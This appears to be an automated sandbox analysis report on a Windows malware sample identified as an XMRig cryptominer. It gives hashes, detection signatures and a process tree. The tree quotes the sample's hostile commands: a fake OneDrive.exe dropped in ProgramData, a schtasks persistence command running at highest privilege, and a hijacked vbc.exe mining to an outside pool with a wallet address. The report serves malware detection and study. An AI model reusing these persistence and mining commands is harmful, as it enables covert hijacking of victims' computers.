Analysis
-
max time kernel
4s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
25/12/2023, 04:56
Static task
static1
Behavioral task
behavioral1
Sample
3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
Resource
win7-20231215-en
General
-
Target
3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
-
Size
2.1MB
-
MD5
93873e5c894e79df6922d2ec95d97b10
-
SHA1
76d6c12bed4db10242ec6da68c9a2ffdf543061a
-
SHA256
3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042
-
SHA512
238151ab9143d57f7cc2f419efd03022b1d73c436295ca101871064671d4254e2bbc546afdb6ca9ddf07e1bf7b89b1b2ec70ffadb63f40667d3e5f6668e2b63f
-
SSDEEP
49152:WOpNKrf9VNvk53Kli7Ib1Ei3LMespDC5ASTwhlItlW:WOvKBVNvq3x4twespDC5Lkm6
Malware Config
Signatures
-
XMRig Miner payload 3 IoCs
resource yara_rule behavioral2/memory/4288-81-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4288-80-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4288-123-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1140 OneDrive.exe -
resource yara_rule behavioral2/memory/4288-76-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4288-81-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4288-80-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4288-72-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4288-70-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4288-123-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4316 schtasks.exe 436 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1740 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 996 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe 996 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe 1140 OneDrive.exe 1140 OneDrive.exe 1140 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 996 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe Token: SeDebugPrivilege 1140 OneDrive.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 996 wrote to memory of 4764 996 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe 17 PID 996 wrote to memory of 4764 996 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe 17 PID 4764 wrote to memory of 1740 4764 cmd.exe 15 PID 4764 wrote to memory of 1740 4764 cmd.exe 15 PID 4764 wrote to memory of 1140 4764 cmd.exe 60 PID 4764 wrote to memory of 1140 4764 cmd.exe 60 PID 1140 wrote to memory of 2312 1140 OneDrive.exe 58 PID 1140 wrote to memory of 2312 1140 OneDrive.exe 58 PID 2312 wrote to memory of 4316 2312 cmd.exe 56 PID 2312 wrote to memory of 4316 2312 cmd.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe"C:\Users\Admin\AppData\Local\Temp\3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6AA1.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140
-
-
-
C:\Windows\system32\timeout.exetimeout 31⤵
- Delays execution with timeout.exe
PID:1740
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"1⤵
- Creates scheduled task(s)
PID:4316
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2312
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl1⤵PID:4288
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe1⤵PID:3880
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"2⤵PID:1904
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"3⤵
- Creates scheduled task(s)
PID:436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD590d5e6b298a449bc7a12e32ed2ab0b36
SHA18dac7332a138fd16fd5c1889924fd5a8058cb040
SHA2564a6f2af85fc74a66965f791911d42d050daf2544664377944047c72dcfb5a68d
SHA512caa29dbce1e9846d9e1c3fb641aad4cd942366252b49fd854eff0e7ece2d20a59ef5175bea747f4f66b98320eca6a7f719523af7f0aa3dc66cedcfceb99cb7cd
-
Filesize
92KB
MD5f0707b8cf6d5ce952c031ccd4b959d5c
SHA1f6cba5782d300f2ab68e27b8e228588531dc9ae3
SHA25678733d3f67a35218ea9e9a57d6d474862b0892cd3dc177830d5e19f431d0c055
SHA5121e0134e2ed3e0f391f0f869f4b00822a2273e630d5fa5d1669155797f5359b5583b189ed74af7a630a69fabb2ff5788fb35152e2426f3e4e626215e6e406acb1
-
Filesize
102KB
MD5c7a5ca2fb2dd5345400789e2ad85a41f
SHA1be76bac759bf60106341ba2b1780da85cd28dc0f
SHA2562c3309edabd7a561cfd10a5eb6cbfbb2f5f71a3387d14cda7f6097bb3cdb88e0
SHA5123c89bcf73932ee3ee324416845fcbe4159a92ebb716ed271712f85fb69d8d07e1a63db1d00d3196e140b050ec0f36e379d5db9006260c1e9b61be4ea7b9043f0
-
Filesize
1KB
MD5879faeecba1716ac3ad7bc3662ffb86e
SHA10f489962ae42883915d16449b881e4eb57ec7f9e
SHA256ca38f4cb9f7b3c256a481fd8c86540558a0d9872ba1fc19181483ea5811ced68
SHA512542c9501d4583b86dfacd89e33c31265f2385cb3461fe41d80aeb83d415c2480144a8371ef23175284645569bec1a1274772d1b640d9fab4d002e78740216966
-
Filesize
176B
MD5e0d328d816d78e244bc75eb15d81476f
SHA12e750a9910e3fc5b24dd01f8aab66f9a84664c57
SHA25689cb06325efd1ec01ebbab7dc2881011a283371440596be829ca618f28672219
SHA51212849c3442da2872aa6fdeb654bae3453d753c1a0c427db62117ad4be50226343d9020c74f96d000c0b83166964b138829816c90593f1ad3adf622db91aa2422